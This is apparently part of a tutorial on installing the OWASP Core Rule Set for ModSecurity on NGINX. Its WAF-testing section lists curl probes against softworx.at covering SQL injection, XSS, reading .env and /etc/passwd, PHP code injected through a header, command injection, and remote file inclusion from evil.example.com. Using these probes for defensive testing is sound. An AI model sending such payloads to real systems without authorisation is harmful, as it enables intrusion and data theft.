Part 2 – Installing the OWASP Core Rule Set (CRS)
After successfully installing ModSecurity v3 in Part 1, this guide will now show you how to install and activate the OWASP Core Rule Set to enable protection rules for ModSecurity.
Download and Activate the OWASP CRS
The following commands will let you download and activate the rule set. Change to the modsec directory, clone the Git repository, and create the crs-setup.conf file:
cd /etc/nginx/modsec
sudo git clone https://github.com/coreruleset/coreruleset.git
cd coreruleset
sudo cp crs-setup.conf.example crs-setup.confNext, include the following files in your modsecurity.conf file to activate the OWASP CRS:
Include /etc/nginx/modsec/coreruleset/crs-setup.conf
Include /etc/nginx/modsec/coreruleset/rules/*.confAfter restarting NGINX, the rule set is active:
sudo nginx -t && sudo systemctl reload nginxTesting the OWASP CRS
The following tests can be used to verify that the rule set is working. Either enter the URL in your browser or use curl with the -I parameter.
SQL injection via manipulated parameter:
curl -I "https://softworx.at/?id=1'+or+1=1--"Cross Site Scripting (XSS) – simple JavaScript:
curl -I "https://softworx.at/?search=<script>alert(1)</script>"Attempt to access a sensitive .env file:
curl -I "https://softworx.at/.env"Path traversal to access system files:
curl -I "https://softworx.at/index.php?file=../../../../etc/passwd"Remote Code Execution via header injection:
curl -I -H "User-Agent: <?php system('id'); ?>" "https://softworx.at/"Command Injection via GET parameter:
curl -I "https://softworx.at/?cmd=ls%20-la"Remote File Inclusion (RFI):
curl -I "https://softworx.at/?page=http://evil.example.com/shell.txt"OWASP CRS and WordPress
If you’ve activated the OWASP CRS for a WordPress website, you’ll soon encounter issues while editing content, as WordPress functions may be blocked..
In Part 3, you’ll learn which exceptions need to be added to make WordPress function properly again.
Leave a Reply
You must be logged in to post a comment.